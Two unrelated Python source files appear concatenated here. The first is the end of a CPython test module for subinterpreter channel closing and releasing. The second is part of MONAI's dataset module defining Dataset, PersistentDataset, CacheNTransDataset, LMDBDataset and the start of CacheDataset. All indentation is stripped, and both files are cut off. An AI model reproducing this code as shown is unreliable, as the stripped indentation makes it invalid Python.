interpreters.channel_send(cid, None)
interpreters.channel_recv(cid)
interpreters.channel_send(cid, b'spam')
interpreters.channel_release(cid, send=True)
obj = interpreters.channel_recv(cid)
self.assertEqual(obj, b'spam')
def test_used_multiple_times_by_single_user(self):
cid = interpreters.channel_create()
interpreters.channel_send(cid, b'spam')
interpreters.channel_send(cid, b'spam')
interpreters.channel_send(cid, b'spam')
interpreters.channel_recv(cid)
interpreters.channel_release(cid, send=True, recv=True)
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_send(cid, b'eggs')
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_recv(cid)
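# ChannelCloseFixture carries everything one permutation of the exhaustive
# close tests needs: the channel end under test, the interpreters involved
# (interp/other/extra), the channel creator, and the evolving expected
# ChannelState.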
class ChannelCloseFixture(namedtuple('ChannelCloseFixture',
'end interp other extra creator')):
# Set this to True to avoid creating interpreters, e.g. when
# scanning through test permutations without running them.
QUICK = False
def __new__(cls, end, interp, other, extra, creator):
assert end in ('send', 'recv')
if cls.QUICK:
known = {}
else:
interp = Interpreter.from_raw(interp)
other = Interpreter.from_raw(other)
extra = Interpreter.from_raw(extra)
known = {
interp.name: interp,
other.name: other,
extra.name: extra,
}
if not creator:
creator = 'same'
self = super().__new__(cls, end, interp, other, extra, creator)
self._prepped = set()
self._state = ChannelState()
self._known = known
return self
@property
def state(self):
return self._state
@property
def cid(self):
try:
return self._cid
except AttributeError:
creator = self._get_interpreter(self.creator)
self._cid = self._new_channel(creator)
return self._cid
def get_interpreter(self, interp):
interp = self._get_interpreter(interp)
self._prep_interpreter(interp)
return interp
def expect_closed_error(self, end=None):
if end is None:
end = self.end
if end == 'recv' and self.state.closed == 'send':
return False
return bool(self.state.closed)
def prep_interpreter(self, interp):
self._prep_interpreter(interp)
def record_action(self, action, result):
self._state = result
def clean_up(self):
clean_up_interpreters()
clean_up_channels()
# internal methods
def _new_channel(self, creator):
if creator.name == 'main':
return interpreters.channel_create()
else:
ch = interpreters.channel_create()
run_interp(creator.id, f"""
import _xxsubinterpreters
cid = _xxsubinterpreters.channel_create()
# We purposefully send back an int to avoid tying the
# channel to the other interpreter.
_xxsubinterpreters.channel_send({ch}, int(cid))
del _xxsubinterpreters
""")
self._cid = interpreters.channel_recv(ch)
return self._cid
def _get_interpreter(self, interp):
if interp in ('same', 'interp'):
return self.interp
elif interp == 'other':
return self.other
elif interp == 'extra':
return self.extra
else:
name = interp
try:
interp = self._known[name]
except KeyError:
interp = self._known[name] = Interpreter(name)
return interp
def _prep_interpreter(self, interp):
if interp.id in self._prepped:
return
self._prepped.add(interp.id)
if interp.name == 'main':
return
run_interp(interp.id, f"""
import _xxsubinterpreters as interpreters
import test.test__xxsubinterpreters as helpers
ChannelState = helpers.ChannelState
try:
cid
except NameError:
cid = interpreters._channel_id({self.cid})
""")
@unittest.skip('these tests take several hours to run')
class ExhaustiveChannelTests(TestBase):
"""
- main / interp / other
- run in: current thread / new thread / other thread / different threads
- end / opposite
- force / no force
- used / not used (associated / not associated)
- empty / emptied / never emptied / partly emptied
- closed / not closed
- released / not released
- creator (interp) / other
- associated interpreter not running
- associated interpreter destroyed
- close after unbound
"""
"""
use
pre-close
close
after
check
"""
"""
close in: main, interp1
creator: same, other, extra
use: None,send,recv,send/recv in None,same,other,same+other,all
pre-close: None,send,recv in None,same,other,same+other,all
pre-close forced: None,send,recv in None,same,other,same+other,all
close: same
close forced: same
use after: None,send,recv,send/recv in None,same,other,extra,same+other,all
close after: None,send,recv,send/recv in None,same,other,extra,same+other,all
check closed: send/recv for same/other(incl. interp2)
"""
def iter_action_sets(self):
# - used / not used (associated / not associated)
# - empty / emptied / never emptied / partly emptied
# - closed / not closed
# - released / not released
# never used
yield []
# only pre-closed (and possible used after)
for closeactions in self._iter_close_action_sets('same', 'other'):
yield closeactions
for postactions in self._iter_post_close_action_sets():
yield closeactions + postactions
for closeactions in self._iter_close_action_sets('other', 'extra'):
yield closeactions
for postactions in self._iter_post_close_action_sets():
yield closeactions + postactions
# used
for useactions in self._iter_use_action_sets('same', 'other'):
yield useactions
for closeactions in self._iter_close_action_sets('same', 'other'):
actions = useactions + closeactions
yield actions
for postactions in self._iter_post_close_action_sets():
yield actions + postactions
for closeactions in self._iter_close_action_sets('other', 'extra'):
actions = useactions + closeactions
yield actions
for postactions in self._iter_post_close_action_sets():
yield actions + postactions
for useactions in self._iter_use_action_sets('other', 'extra'):
yield useactions
for closeactions in self._iter_close_action_sets('same', 'other'):
actions = useactions + closeactions
yield actions
for postactions in self._iter_post_close_action_sets():
yield actions + postactions
for closeactions in self._iter_close_action_sets('other', 'extra'):
actions = useactions + closeactions
yield actions
for postactions in self._iter_post_close_action_sets():
yield actions + postactions
def _iter_use_action_sets(self, interp1, interp2):
interps = (interp1, interp2)
# only recv end used
yield [
ChannelAction('use', 'recv', interp1),
]
yield [
ChannelAction('use', 'recv', interp2),
]
yield [
ChannelAction('use', 'recv', interp1),
ChannelAction('use', 'recv', interp2),
]
# never emptied
yield [
ChannelAction('use', 'send', interp1),
]
yield [
ChannelAction('use', 'send', interp2),
]
yield [
ChannelAction('use', 'send', interp1),
ChannelAction('use', 'send', interp2),
]
# partially emptied
for interp1 in interps:
for interp2 in interps:
for interp3 in interps:
yield [
ChannelAction('use', 'send', interp1),
ChannelAction('use', 'send', interp2),
ChannelAction('use', 'recv', interp3),
]
# fully emptied
for interp1 in interps:
for interp2 in interps:
for interp3 in interps:
for interp4 in interps:
yield [
ChannelAction('use', 'send', interp1),
ChannelAction('use', 'send', interp2),
ChannelAction('use', 'recv', interp3),
ChannelAction('use', 'recv', interp4),
]
def _iter_close_action_sets(self, interp1, interp2):
ends = ('recv', 'send')
interps = (interp1, interp2)
for force in (True, False):
op = 'force-close' if force else 'close'
for interp in interps:
for end in ends:
yield [
ChannelAction(op, end, interp),
]
for recvop in ('close', 'force-close'):
for sendop in ('close', 'force-close'):
for recv in interps:
for send in interps:
yield [
ChannelAction(recvop, 'recv', recv),
ChannelAction(sendop, 'send', send),
]
def _iter_post_close_action_sets(self):
for interp in ('same', 'extra', 'other'):
yield [
ChannelAction('use', 'recv', interp),
]
yield [
ChannelAction('use', 'send', interp),
]
def run_actions(self, fix, actions):
for action in actions:
self.run_action(fix, action)
def run_action(self, fix, action, *, hideclosed=True):
end = action.resolve_end(fix.end)
interp = action.resolve_interp(fix.interp, fix.other, fix.extra)
fix.prep_interpreter(interp)
if interp.name == 'main':
result = run_action(
fix.cid,
action.action,
end,
fix.state,
hideclosed=hideclosed,
)
fix.record_action(action, result)
else:
_cid = interpreters.channel_create()
run_interp(interp.id, f"""
result = helpers.run_action(
{fix.cid},
{repr(action.action)},
{repr(end)},
{repr(fix.state)},
hideclosed={hideclosed},
)
interpreters.channel_send({_cid}, result.pending.to_bytes(1, 'little'))
interpreters.channel_send({_cid}, b'X' if result.closed else b'')
""")
result = ChannelState(
pending=int.from_bytes(interpreters.channel_recv(_cid), 'little'),
closed=bool(interpreters.channel_recv(_cid)),
)
fix.record_action(action, result)
def iter_fixtures(self):
# XXX threads?
interpreters = [
('main', 'interp', 'extra'),
('interp', 'main', 'extra'),
('interp1', 'interp2', 'extra'),
('interp1', 'interp2', 'main'),
]
for interp, other, extra in interpreters:
for creator in ('same', 'other', 'creator'):
for end in ('send', 'recv'):
yield ChannelCloseFixture(end, interp, other, extra, creator)
def _close(self, fix, *, force):
op = 'force-close' if force else 'close'
close = ChannelAction(op, fix.end, 'same')
if not fix.expect_closed_error():
self.run_action(fix, close, hideclosed=False)
else:
with self.assertRaises(interpreters.ChannelClosedError):
self.run_action(fix, close, hideclosed=False)
def _assert_closed_in_interp(self, fix, interp=None):
if interp is None or interp.name == 'main':
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_recv(fix.cid)
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_send(fix.cid, b'spam')
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_close(fix.cid)
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_close(fix.cid, force=True)
else:
run_interp(interp.id, f"""
with helpers.expect_channel_closed():
interpreters.channel_recv(cid)
""")
run_interp(interp.id, f"""
with helpers.expect_channel_closed():
interpreters.channel_send(cid, b'spam')
""")
run_interp(interp.id, f"""
with helpers.expect_channel_closed():
interpreters.channel_close(cid)
""")
run_interp(interp.id, f"""
with helpers.expect_channel_closed():
interpreters.channel_close(cid, force=True)
""")
def _assert_closed(self, fix):
self.assertTrue(fix.state.closed)
for _ in range(fix.state.pending):
interpreters.channel_recv(fix.cid)
self._assert_closed_in_interp(fix)
for interp in ('same', 'other'):
interp = fix.get_interpreter(interp)
if interp.name == 'main':
continue
self._assert_closed_in_interp(fix, interp)
interp = fix.get_interpreter('fresh')
self._assert_closed_in_interp(fix, interp)
def _iter_close_tests(self, verbose=False):
i = 0
for actions in self.iter_action_sets():
print()
for fix in self.iter_fixtures():
i += 1
if i > 1000:
return
if verbose:
if (i - 1) % 6 == 0:
print()
print(i, fix, '({} actions)'.format(len(actions)))
else:
if (i - 1) % 6 == 0:
print(' ', end='')
print('.', end=''); sys.stdout.flush()
yield i, fix, actions
if verbose:
print('---')
print()
# This is useful for scanning through the possible tests.
def _skim_close_tests(self):
ChannelCloseFixture.QUICK = True
for i, fix, actions in self._iter_close_tests():
pass
def test_close(self):
for i, fix, actions in self._iter_close_tests():
with self.subTest('{} {} {}'.format(i, fix, actions)):
fix.prep_interpreter(fix.interp)
self.run_actions(fix, actions)
self._close(fix, force=False)
self._assert_closed(fix)
# XXX Things slow down if we have too many interpreters.
fix.clean_up()
def test_force_close(self):
for i, fix, actions in self._iter_close_tests():
with self.subTest('{} {} {}'.format(i, fix, actions)):
fix.prep_interpreter(fix.interp)
self.run_actions(fix, actions)
self._close(fix, force=True)
self._assert_closed(fix)
# XXX Things slow down if we have too many interpreters.
fix.clean_up()
if __name__ == '__main__':
unittest.main()
|
dataset.py
|
# Copyright 2020 - 2021 MONAI Consortium
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import collections.abc
import math
import pickle
import shutil
import sys
import tempfile
import threading
import time
import warnings
from copy import copy, deepcopy
from multiprocessing.pool import ThreadPool
from pathlib import Path
from typing import IO, TYPE_CHECKING, Any, Callable, Dict, List, Optional, Sequence, Union
import numpy as np
import torch
from torch.utils.data import Dataset as _TorchDataset
from torch.utils.data import Subset
from monai.data.utils import convert_tables_to_dicts, first, pickle_hashing
from monai.transforms import Compose, Randomizable, ThreadUnsafe, Transform, apply_transform
from monai.utils import MAX_SEED, ensure_tuple, get_seed, min_version, optional_import
if TYPE_CHECKING:
from tqdm import tqdm
has_tqdm = True
else:
tqdm, has_tqdm = optional_import("tqdm", "4.47.0", min_version, "tqdm")
lmdb, _ = optional_import("lmdb")
pd, _ = optional_import("pandas")
class Dataset(_TorchDataset):
"""
A generic dataset with a length property and an optional callable data transform
when fetching a data sample.
If passing slicing indices, will return a PyTorch Subset, for example: `data: Subset = dataset[1:4]`,
for more details, please check: https://pytorch.org/docs/stable/data.html#torch.utils.data.Subset
For example, typical input data can be a list of dictionaries::
[{ { {
'img': 'image1.nii.gz', 'img': 'image2.nii.gz', 'img': 'image3.nii.gz',
'seg': 'label1.nii.gz', 'seg': 'label2.nii.gz', 'seg': 'label3.nii.gz',
'extra': 123 'extra': 456 'extra': 789
}, }, }]
"""
def __init__(self, data: Sequence, transform: Optional[Callable] = None) -> None:
"""
Args:
data: input data to load and transform to generate dataset for model.
transform: a callable data transform on input data.
"""
self.data = data
self.transform = transform
def __len__(self) -> int:
return len(self.data)
def _transform(self, index: int):
"""
Fetch single data item from `self.data`.
"""
data_i = self.data[index]
return apply_transform(self.transform, data_i) if self.transform is not None else data_i
def __getitem__(self, index: Union[int, slice, Sequence[int]]):
"""
Returns a `Subset` if `index` is a slice or Sequence, a data item otherwise.
"""
if isinstance(index, slice):
# dataset[:42]
start, stop, step = index.indices(len(self))
indices = range(start, stop, step)
return Subset(dataset=self, indices=indices)
if isinstance(index, collections.abc.Sequence):
# dataset[[1, 3, 4]]
return Subset(dataset=self, indices=index)
return self._transform(index)
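# Minimal usage sketch for Dataset (the toy integer data and the squaring
# transform below are illustrative assumptions): integer indexing applies the
# transform to a single item, while slicing returns a torch.utils.data.Subset.
def _dataset_indexing_sketch():
    ds = Dataset(data=[1, 2, 3, 4, 5], transform=lambda x: x * x)
    single = ds[1]    # -> 4, transform applied to one item
    subset = ds[1:4]  # -> Subset over indices 1..3, items transformed lazily
    return single, [subset[i] for i in range(len(subset))]  # -> (4, [4, 9, 16])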
class PersistentDataset(Dataset):
"""
Persistent storage of pre-computed values, used to efficiently manage larger-than-memory dictionary-format data;
it can apply transforms to specific fields. Results from the non-random transform components are computed
when first used, and stored in the `cache_dir` for rapid retrieval on subsequent uses.
If passing slicing indices, will return a PyTorch Subset, for example: `data: Subset = dataset[1:4]`,
for more details, please check: https://pytorch.org/docs/stable/data.html#torch.utils.data.Subset
The transforms which are supposed to be cached must implement the `monai.transforms.Transform`
interface and should not be `Randomizable`. This dataset will cache the outcomes before the first
`Randomizable` `Transform` within a `Compose` instance.
For example, typical input data can be a list of dictionaries::
[{ { {
'image': 'image1.nii.gz', 'image': 'image2.nii.gz', 'image': 'image3.nii.gz',
'label': 'label1.nii.gz', 'label': 'label2.nii.gz', 'label': 'label3.nii.gz',
'extra': 123 'extra': 456 'extra': 789
}, }, }]
For a composite transform like
.. code-block:: python
[ LoadImaged(keys=['image', 'label']),
Orientationd(keys=['image', 'label'], axcodes='RAS'),
ScaleIntensityRanged(keys=['image'], a_min=-57, a_max=164, b_min=0.0, b_max=1.0, clip=True),
RandCropByPosNegLabeld(keys=['image', 'label'], label_key='label', spatial_size=(96, 96, 96),
pos=1, neg=1, num_samples=4, image_key='image', image_threshold=0),
ToTensord(keys=['image', 'label'])]
Upon first use a filename-based dataset will be processed by the transform for the
[LoadImaged, Orientationd, ScaleIntensityRanged] elements and the resulting tensor written to
the `cache_dir` before applying the remaining random-dependent transforms
[RandCropByPosNegLabeld, ToTensord] for use in the analysis.
Subsequent uses of the dataset directly read pre-processed results from `cache_dir`,
followed by applying the random-dependent parts of the transform processing.
During training call `set_data()` to update input data and recompute cache content.
Note:
The input data must be a list of file paths; they are hashed to produce the cache keys.
When loading persistent cache content, there is no guarantee that the cached data matches the
current transform chain, so please use exactly the same non-random transforms and arguments
that produced the cache content; otherwise unexpected errors may occur.
"""
def __init__(
self,
data: Sequence,
transform: Union[Sequence[Callable], Callable],
cache_dir: Optional[Union[Path, str]],
hash_func: Callable[..., bytes] = pickle_hashing,
) -> None:
"""
Args:
data: input data file paths to load and transform to generate dataset for model.
`PersistentDataset` expects the input data to be a list of serializable items
and hashes them as cache keys using `hash_func`.
transform: transforms to execute operations on input data.
cache_dir: If specified, this is the location for persistent storage
of pre-computed transformed data tensors. The cache_dir is computed once, and
persists on disk until explicitly removed. Different runs, programs, experiments
may share a common cache dir provided that the transforms pre-processing is consistent.
If `cache_dir` doesn't exist, will automatically create it.
If `cache_dir` is `None`, there is effectively no caching.
hash_func: a callable to compute hash from data items to be cached.
defaults to `monai.data.utils.pickle_hashing`.
"""
if not isinstance(transform, Compose):
transform = Compose(transform)
super().__init__(data=data, transform=transform)
self.cache_dir = Path(cache_dir) if cache_dir is not None else None
self.hash_func = hash_func
if self.cache_dir is not None:
if not self.cache_dir.exists():
self.cache_dir.mkdir(parents=True, exist_ok=True)
if not self.cache_dir.is_dir():
raise ValueError("cache_dir must be a directory.")
def set_data(self, data: Sequence):
"""
Set the input data and delete all the out-dated cache content.
"""
self.data = data
if self.cache_dir is not None and self.cache_dir.exists():
shutil.rmtree(self.cache_dir, ignore_errors=True)
self.cache_dir.mkdir(parents=True, exist_ok=True)
def _pre_transform(self, item_transformed):
"""
Process the data from original state up to the first random element.
Args:
item_transformed: The data to be transformed
Returns:
the transformed element up to the first identified
random transform object
"""
for _transform in self.transform.transforms: # type:ignore
# execute all the deterministic transforms
if isinstance(_transform, Randomizable) or not isinstance(_transform, Transform):
break
# this is to be consistent with CacheDataset even though it's not in a multi-thread situation.
_xform = deepcopy(_transform) if isinstance(_transform, ThreadUnsafe) else _transform
item_transformed = apply_transform(_xform, item_transformed)
return item_transformed
def _post_transform(self, item_transformed):
"""
Process the data from before the first random transform to the final state ready for evaluation.
Args:
item_transformed: The data to be transformed (already processed up to the first random transform)
Returns:
the transformed element through the random transforms
"""
if not isinstance(self.transform, Compose):
raise ValueError("transform must be an instance of monai.transforms.Compose.")
start_post_randomize_run = False
for _transform in self.transform.transforms:
if (
start_post_randomize_run
or isinstance(_transform, Randomizable)
or not isinstance(_transform, Transform)
):
start_post_randomize_run = True
item_transformed = apply_transform(_transform, item_transformed)
return item_transformed
def _cachecheck(self, item_transformed):
"""
A function to cache the expensive input data transform operations
so that huge data sets (larger than computer memory) can be processed
on the fly as needed, and intermediate results written to disk for
future use.
Args:
item_transformed: The current data element to be mutated into transformed representation
Returns:
The transformed data_element, either from cache, or explicitly computing it.
Warning:
The current implementation does not encode transform information as part of the
hashing mechanism used for generating cache names. If the transforms applied are
changed in any way, the objects in the cache dir will be invalid. The hash for the
cache is ONLY dependent on the input filename paths.
"""
hashfile = None
if self.cache_dir is not None:
data_item_md5 = self.hash_func(item_transformed).decode("utf-8")
hashfile = self.cache_dir / f"{data_item_md5}.pt"
if hashfile is not None and hashfile.is_file(): # cache hit
try:
return torch.load(hashfile)
except PermissionError as e:
if sys.platform != "win32":
raise e
_item_transformed = self._pre_transform(deepcopy(item_transformed)) # keep the original hashed
if hashfile is not None:
# NOTE: Writing to a temporary directory and then using a nearly atomic rename operation
# to make the cache more robust to manual killing of parent process
# which may leave partially written cache files in an incomplete state
with tempfile.TemporaryDirectory() as tmpdirname:
temp_hash_file = Path(tmpdirname) / hashfile.name
torch.save(_item_transformed, temp_hash_file)
if temp_hash_file.is_file() and not hashfile.is_file():
# On Unix, if target exists and is a file, it will be replaced silently if the user has permission.
# for more details: https://docs.python.org/3/library/shutil.html#shutil.move.
try:
shutil.move(temp_hash_file, hashfile)
except FileExistsError:
pass
return _item_transformed
def _transform(self, index: int):
pre_random_item = self._cachecheck(self.data[index])
return self._post_transform(pre_random_item)
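# Minimal usage sketch for PersistentDataset (the NIfTI file names, cache
# directory and transform chain are illustrative assumptions): the first access
# computes and caches the deterministic transforms under cache_dir, later
# accesses read the cached tensors back from disk.
def _persistent_dataset_sketch(cache_dir="./persistent_cache"):
    from monai.transforms import Compose, LoadImaged, ToTensord
    files = [{"image": "image1.nii.gz"}, {"image": "image2.nii.gz"}]  # hypothetical paths
    xform = Compose([LoadImaged(keys="image"), ToTensord(keys="image")])
    ds = PersistentDataset(data=files, transform=xform, cache_dir=cache_dir)
    return ds[0]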
class CacheNTransDataset(PersistentDataset):
"""
Extension of `PersistentDataset` that caches the result of the first N transforms, whether they are random or not.
"""
def __init__(
self,
data: Sequence,
transform: Union[Sequence[Callable], Callable],
cache_n_trans: int,
cache_dir: Optional[Union[Path, str]],
hash_func: Callable[..., bytes] = pickle_hashing,
) -> None:
"""
Args:
data: input data file paths to load and transform to generate dataset for model.
`PersistentDataset` expects the input data to be a list of serializable items
and hashes them as cache keys using `hash_func`.
transform: transforms to execute operations on input data.
cache_n_trans: cache the result of first N transforms.
cache_dir: If specified, this is the location for persistent storage
of pre-computed transformed data tensors. The cache_dir is computed once, and
persists on disk until explicitly removed. Different runs, programs, experiments
may share a common cache dir provided that the transforms pre-processing is consistent.
If `cache_dir` doesn't exist, will automatically create it.
If `cache_dir` is `None`, there is effectively no caching.
hash_func: a callable to compute hash from data items to be cached.
defaults to `monai.data.utils.pickle_hashing`.
"""
super().__init__(data=data, transform=transform, cache_dir=cache_dir, hash_func=hash_func)
self.cache_n_trans = cache_n_trans
def _pre_transform(self, item_transformed):
"""
Process the data from its original state through the first N transforms.
Args:
item_transformed: The data to be transformed
Returns:
the element transformed by the first N transforms
"""
if not isinstance(self.transform, Compose):
raise ValueError("transform must be an instance of monai.transforms.Compose.")
for i, _transform in enumerate(self.transform.transforms):
if i == self.cache_n_trans:
break
_xform = deepcopy(_transform) if isinstance(_transform, ThreadUnsafe) else _transform
item_transformed = apply_transform(_xform, item_transformed)
return item_transformed
def _post_transform(self, item_transformed):
"""
Process the data from the (N + 1)-th transform onward to the final state ready for evaluation.
Args:
item_transformed: The data to be transformed (already processed by the first N transforms)
Returns:
the final transformed result
"""
if not isinstance(self.transform, Compose):
raise ValueError("transform must be an instance of monai.transforms.Compose.")
for i, _transform in enumerate(self.transform.transforms):
if i >= self.cache_n_trans:
item_transformed = apply_transform(_transform, item_transformed)
return item_transformed
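# Minimal sketch for CacheNTransDataset (file name and transforms are
# illustrative assumptions): with cache_n_trans=2 the first two transforms
# (LoadImaged, Orientationd) are cached, and every transform from index 2
# onward runs at fetch time, whether random or not.
def _cache_n_trans_sketch(cache_dir="./n_trans_cache"):
    from monai.transforms import Compose, LoadImaged, Orientationd, ToTensord
    files = [{"image": "image1.nii.gz"}]  # hypothetical NIfTI file
    xform = Compose([
        LoadImaged(keys="image"),
        Orientationd(keys="image", axcodes="RAS"),
        ToTensord(keys="image"),
    ])
    ds = CacheNTransDataset(data=files, transform=xform, cache_n_trans=2, cache_dir=cache_dir)
    return ds[0]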
class LMDBDataset(PersistentDataset):
"""
Extension of `PersistentDataset` using LMDB as the backend.
See Also:
:py:class:`monai.data.PersistentDataset`
Examples:
>>> items = [{"data": i} for i in range(5)]
# [{'data': 0}, {'data': 1}, {'data': 2}, {'data': 3}, {'data': 4}]
>>> lmdb_ds = monai.data.LMDBDataset(items, transform=monai.transforms.SimulateDelayd("data", delay_time=1))
>>> print(list(lmdb_ds)) # using the cached results
"""
def __init__(
self,
data: Sequence,
transform: Union[Sequence[Callable], Callable],
cache_dir: Union[Path, str] = "cache",
hash_func: Callable[..., bytes] = pickle_hashing,
db_name: str = "monai_cache",
progress: bool = True,
pickle_protocol=pickle.HIGHEST_PROTOCOL,
lmdb_kwargs: Optional[dict] = None,
) -> None:
"""
Args:
data: input data file paths to load and transform to generate dataset for model.
`LMDBDataset` expects the input data to be a list of serializable items
and hashes them as cache keys using `hash_func`.
transform: transforms to execute operations on input data.
cache_dir: if specified, this is the location for persistent storage
of pre-computed transformed data tensors. The cache_dir is computed once, and
persists on disk until explicitly removed. Different runs, programs, experiments
may share a common cache dir provided that the transforms pre-processing is consistent.
If the cache_dir doesn't exist, will automatically create it. Defaults to "./cache".
hash_func: a callable to compute hash from data items to be cached.
defaults to `monai.data.utils.pickle_hashing`.
db_name: lmdb database file name. Defaults to "monai_cache".
progress: whether to display a progress bar.
pickle_protocol: pickle protocol version. Defaults to pickle.HIGHEST_PROTOCOL.
https://docs.python.org/3/library/pickle.html#pickle-protocols
lmdb_kwargs: additional keyword arguments to the lmdb environment.
for more details please visit: https://lmdb.readthedocs.io/en/release/#environment-class
"""
super().__init__(data=data, transform=transform, cache_dir=cache_dir, hash_func=hash_func)
self.progress = progress
if not self.cache_dir:
raise ValueError("cache_dir must be specified.")
self.db_file = self.cache_dir / f"{db_name}.lmdb"
self.pickle_protocol = pickle_protocol
self.lmdb_kwargs = lmdb_kwargs or {}
if not self.lmdb_kwargs.get("map_size", 0):
self.lmdb_kwargs["map_size"] = 1024 ** 4 # default map_size
# lmdb is single-writer multi-reader by default
# the cache is created without multi-threading
self._read_env = None
# this runs on the primary thread/process
self._fill_cache_start_reader(show_progress=self.progress)
print(f"Accessing lmdb file: {self.db_file.absolute()}.")
def set_data(self, data: Sequence):
"""
Set the input data and delete all the out-dated cache content.
"""
super().set_data(data=data)
self._read_env = self._fill_cache_start_reader(show_progress=self.progress)
def _fill_cache_start_reader(self, show_progress=True):
"""
Check the LMDB cache and write it if needed. py-lmdb does not support concurrent writes well.
This method can be used from multiple processes, but doing so may hurt performance.
Args:
show_progress: whether to show the progress bar if possible.
"""
# create cache
self.lmdb_kwargs["readonly"] = False
env = lmdb.open(path=f"{self.db_file}", subdir=False, **self.lmdb_kwargs)
if show_progress and not has_tqdm:
warnings.warn("LMDBDataset: tqdm is not installed. not displaying the caching progress.")
with env.begin(write=False) as search_txn:
for item in tqdm(self.data) if has_tqdm and show_progress else self.data:
key = self.hash_func(item)
done, retry, val = False, 5, None
while not done and retry > 0:
try:
with search_txn.cursor() as cursor:
done = cursor.set_key(key)
if done:
continue
if val is None:
val = self._pre_transform(deepcopy(item)) # keep the original hashed
val = pickle.dumps(val, protocol=self.pickle_protocol)
with env.begin(write=True) as txn:
txn.put(key, val)
done = True
except lmdb.MapFullError:
done, retry = False, retry - 1
size = env.info()["map_size"]
new_size = size * 2
warnings.warn(
f"Resizing the cache database from {int(size) >> 20}MB" f" to {int(new_size) >> 20}MB."
)
env.set_mapsize(new_size)
except lmdb.MapResizedError:
# the mapsize is increased by another process
# set_mapsize with a size of 0 to adopt the new size
env.set_mapsize(0)
if not done: # still has the map full error
size = env.info()["map_size"]
env.close()
raise ValueError(f"LMDB map size reached, increase size above current size of {size}.")
size = env.info()["map_size"]
env.close()
# read-only database env
self.lmdb_kwargs["readonly"] = True
self.lmdb_kwargs["map_size"] = size
if self.lmdb_kwargs.get("lock", None) is None:
self.lmdb_kwargs["lock"] = False
if self.lmdb_kwargs.get("readahead", None) is None:
self.lmdb_kwargs["readahead"] = False
return lmdb.open(path=f"{self.db_file}", subdir=False, **self.lmdb_kwargs)
def _cachecheck(self, item_transformed):
"""
If the item is not found in the LMDB file, fall back to the default `PersistentDataset` caching behaviour.
"""
if self._read_env is None:
# this runs on multiple processes, each one should have its own env.
self._read_env = self._fill_cache_start_reader(show_progress=False)
with self._read_env.begin(write=False) as txn:
data = txn.get(self.hash_func(item_transformed))
if data is None:
warnings.warn("LMDBDataset: cache key not found, running fallback caching.")
return super()._cachecheck(item_transformed)
try:
return pickle.loads(data)
except Exception as err:
raise RuntimeError("Invalid cache value, corrupted lmdb file?") from err
def info(self):
"""
Returns: dataset info dictionary.
"""
if self._read_env is None:
self._read_env = self._fill_cache_start_reader()
out = dict(self._read_env.info())
out["size"] = len(self.data)
out["filename"] = f"{self.db_file.absolute()}"
return out
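# Small sketch of LMDBDataset bookkeeping, mirroring the docstring example above
# (requires the optional `lmdb` dependency; the cache directory is an assumption):
# info() exposes the LMDB environment info plus the dataset size and backing file.
def _lmdb_info_sketch(cache_dir="./lmdb_cache"):
    import monai.transforms as mt
    items = [{"data": i} for i in range(5)]
    ds = LMDBDataset(items, transform=mt.SimulateDelayd("data", delay_time=0.1), cache_dir=cache_dir)
    meta = ds.info()
    return meta["size"], meta["filename"]  # -> 5, ".../lmdb_cache/monai_cache.lmdb"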
class CacheDataset(Dataset):
"""
Dataset with cache mechanism that can load data and cache deterministic transforms' result during training.
By caching the results of non-random preprocessing transforms, it accelerates the training data pipeline.
If the requested data is not in the cache, all transforms will run normally
(see also :py:class:`monai.data.dataset.Dataset`).
Users can set the cache rate or number of items to cache.
It is recommended to experiment with different `cache_num` or `cache_rate` to identify the best training speed.
The transforms which are supposed to be cached must implement the `monai.transforms.Transform`
interface and should not be `Randomizable`. This dataset will cache the outcomes before the first
`Randomizable` `Transform` within a `Compose` instance.
To improve caching efficiency, always put as many non-random transforms as possible
before the randomized ones when composing the chain of transforms.
If passing slicing indices, will return a PyTorch Subset, for example: `data: Subset = dataset[1:4]`,
for more details, please check: https://pytorch.org/docs/stable/data.html#torch.utils.data.Subset
For example, if the transform is a `Compose` of::
transforms = Compose([
LoadImaged(),
AddChanneld(),
Spacingd(),
Orientationd(),
ScaleIntensityRanged(),
RandCropByPosNegLabeld(),
ToTensord()
])
when `transforms` is used in a multi-epoch training pipeline, before the first training epoch,
this dataset will cache the results up to ``ScaleIntensityRanged``, as
all non-random transforms `LoadImaged`, `AddChanneld`, `Spacingd`, `Orientationd`, `ScaleIntensityRanged`
can be cached. During training, the dataset will load the cached results and run
``RandCropByPosNegLabeld`` and ``ToTensord``, as ``RandCropByPosNegLabeld`` is a randomized transform
and its outcome is not cached.
During training call `set_data()` to update input data and recompute cache content, note that it requires
`persistent_workers=False` in the PyTorch DataLoader.
Note:
`CacheDataset` executes non-random transforms and prepares the cache content in the main process before
the first epoch, then all the subprocesses of the DataLoader read the same cache content from the main process
during training. Preparing the cache content may take a long time, depending on the size of the expected cache data.
To debug or verify the program before real training, users can set `cache_rate=0.0` or `cache_num=0` to
temporarily skip caching.
"""
def __init__(
self,
data: Sequence,
transform: Union[Sequence[Callable], Callable],
cache_num: int = sys.maxsize,
cache_rate: float = 1.0,
num_workers: Optional[int] = None,
progress: bool = True,
) -> None:
"""
Args:
data: input data to load and transform to generate dataset for model.
transform: transforms to execute operations on input data.
cache_num: number of items to be cached. Default is `sys.maxsize`.
will take the minimum of (cache_num, data_length x cache_rate, data_length).
cache_rate: percentage of cached data in total, default is 1.0 (cache all).
will take the minimum of (cache_num, data_length x cache_rate, data_length).
num_workers: the number of worker processes to use.
If num_workers is None then the number returned by os.cpu_count() is used.
progress: whether to display a progress bar.
"""
if not isinstance(transform, Compose):
transform = Compose(transform)
super().__init__(data=data, transform=transform)
self.progress = progress
self.cache_num = min(int(cache_num), int(len(data) * cache_rate), len(data))
self.num_workers = num_workers
if self.num_workers is not None:
self.num_workers = max(int(self.num_workers), 1)
self._cache: List = self._fill_cache()
def set_data(self, data: Sequence):
"""
Set the input data and run deterministic transforms to generate cache content.
